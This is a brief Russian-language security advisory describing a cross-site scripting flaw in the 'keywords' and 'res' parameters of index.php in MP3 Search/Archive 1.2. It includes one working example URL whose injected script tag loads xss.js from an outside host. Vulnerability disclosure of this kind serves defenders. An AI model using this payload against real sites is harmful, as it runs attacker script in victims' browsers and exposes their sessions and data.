Программа: MP3 Search/Archive 1.2, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "keywords" и "res" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/search/index.php?letter=O&p=2&res=92">">">">’>’> <"">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js> </SCRIPT><"<"<"<‘<‘



Оставить мнение